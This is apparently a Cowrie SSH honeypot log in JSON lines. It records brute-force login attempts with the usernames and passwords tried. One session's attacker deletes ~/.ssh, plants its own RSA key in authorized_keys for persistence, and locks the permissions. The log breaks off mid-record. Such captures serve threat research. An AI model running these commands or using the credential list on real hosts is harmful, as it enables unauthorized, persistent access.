{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:28.740858Z","src_ip":"212.227.125.160","session":"1ff27312faec"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":37882,"dst_ip":"1.2.3.4","dst_port":22,"session":"a06c0fb3958d","protocol":"ssh","message":"New connection: 82.67.125.95:37882 (1.2.3.4:22) [session: a06c0fb3958d]","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.338280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.339460Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.374398Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.login.success","username":"root","password":"Huayun@123","message":"login attempt [root/Huayun@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.556166Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:45:51.647865Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.648616Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.649835Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.687223Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:45:51.815808Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.816510Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.854797Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.855752Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":37886,"dst_ip":"1.2.3.4","dst_port":22,"session":"7216c83b0e6c","protocol":"ssh","message":"New connection: 82.67.125.95:37886 (1.2.3.4:22) [session: 7216c83b0e6c]","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.889302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.889965Z","src_ip":"82.67.125.95","session":"7216c83b0e6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:45:51.925707Z","src_ip":"82.67.125.95","session":"7216c83b0e6c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:45:52.108894Z","src_ip":"82.67.125.95","session":"7216c83b0e6c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:53.148290Z","src_ip":"82.67.125.95","session":"7216c83b0e6c"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":37902,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3dd0f1e3ffe","protocol":"ssh","message":"New connection: 82.67.125.95:37902 (1.2.3.4:22) [session: a3dd0f1e3ffe]","sensor":"my-vps","timestamp":"2025-08-31T01:45:53.183382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:45:53.184303Z","src_ip":"82.67.125.95","session":"a3dd0f1e3ffe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:45:53.220358Z","src_ip":"82.67.125.95","session":"a3dd0f1e3ffe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:45:53.407674Z","src_ip":"82.67.125.95","session":"a3dd0f1e3ffe"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:53.444975Z","src_ip":"82.67.125.95","session":"a06c0fb3958d"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:53.446107Z","src_ip":"82.67.125.95","session":"a3dd0f1e3ffe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43978,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb57f0fe46eb","protocol":"ssh","message":"New connection: 212.227.235.229:43978 (1.2.3.4:22) [session: bb57f0fe46eb]","sensor":"my-vps","timestamp":"2025-08-31T01:46:03.536889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:46:04.354934Z","src_ip":"212.227.235.229","session":"bb57f0fe46eb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:46:04.355628Z","src_ip":"212.227.235.229","session":"bb57f0fe46eb"}
{"eventid":"cowrie.login.failed","username":"docker","password":"P@ssw0rd123","message":"login attempt [docker/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:46:10.331230Z","src_ip":"212.227.235.229","session":"bb57f0fe46eb"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:46:12.259672Z","src_ip":"212.227.235.229","session":"bb57f0fe46eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34846,"dst_ip":"1.2.3.4","dst_port":22,"session":"f192397ccfec","protocol":"ssh","message":"New connection: 212.227.125.160:34846 (1.2.3.4:22) [session: f192397ccfec]","sensor":"my-vps","timestamp":"2025-08-31T01:46:25.861665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:46:26.499238Z","src_ip":"212.227.125.160","session":"f192397ccfec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:46:26.500824Z","src_ip":"212.227.125.160","session":"f192397ccfec"}
{"eventid":"cowrie.login.failed","username":"docker","password":"P@ssw0rd123","message":"login attempt [docker/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:46:29.168019Z","src_ip":"212.227.125.160","session":"f192397ccfec"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:46:30.540252Z","src_ip":"212.227.125.160","session":"f192397ccfec"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:46:32.638207Z","src_ip":"212.227.235.229","session":"1f95e8c84ee6"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":53144,"dst_ip":"1.2.3.4","dst_port":22,"session":"e16ace9ca320","protocol":"ssh","message":"New connection: 82.67.125.95:53144 (1.2.3.4:22) [session: e16ace9ca320]","sensor":"my-vps","timestamp":"2025-08-31T01:46:50.149885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:46:50.150922Z","src_ip":"82.67.125.95","session":"e16ace9ca320"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:46:50.187177Z","src_ip":"82.67.125.95","session":"e16ace9ca320"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"12345678","message":"login attempt [teamspeak/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:46:50.371982Z","src_ip":"82.67.125.95","session":"e16ace9ca320"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:46:51.410146Z","src_ip":"82.67.125.95","session":"e16ace9ca320"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54014,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1db0ebda73d","protocol":"ssh","message":"New connection: 212.227.235.229:54014 (1.2.3.4:22) [session: e1db0ebda73d]","sensor":"my-vps","timestamp":"2025-08-31T01:47:07.035077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:47:07.785877Z","src_ip":"212.227.235.229","session":"e1db0ebda73d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:47:07.786853Z","src_ip":"212.227.235.229","session":"e1db0ebda73d"}
{"eventid":"cowrie.login.failed","username":"docker","password":"letmein","message":"login attempt [docker/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T01:47:13.789872Z","src_ip":"212.227.235.229","session":"e1db0ebda73d"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:47:15.953318Z","src_ip":"212.227.235.229","session":"e1db0ebda73d"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":57878,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f9b8d92d0ce","protocol":"ssh","message":"New connection: 115.190.94.119:57878 (1.2.3.4:22) [session: 1f9b8d92d0ce]","sensor":"my-vps","timestamp":"2025-08-31T01:47:26.086391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:47:26.087452Z","src_ip":"115.190.94.119","session":"1f9b8d92d0ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:47:26.304335Z","src_ip":"115.190.94.119","session":"1f9b8d92d0ce"}
{"eventid":"cowrie.login.success","username":"root","password":"wangtao520","message":"login attempt [root/wangtao520] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:47:27.193032Z","src_ip":"115.190.94.119","session":"1f9b8d92d0ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44356,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae82990052fe","protocol":"ssh","message":"New connection: 212.227.125.160:44356 (1.2.3.4:22) [session: ae82990052fe]","sensor":"my-vps","timestamp":"2025-08-31T01:47:29.587453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:47:29.883610Z","src_ip":"212.227.125.160","session":"ae82990052fe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-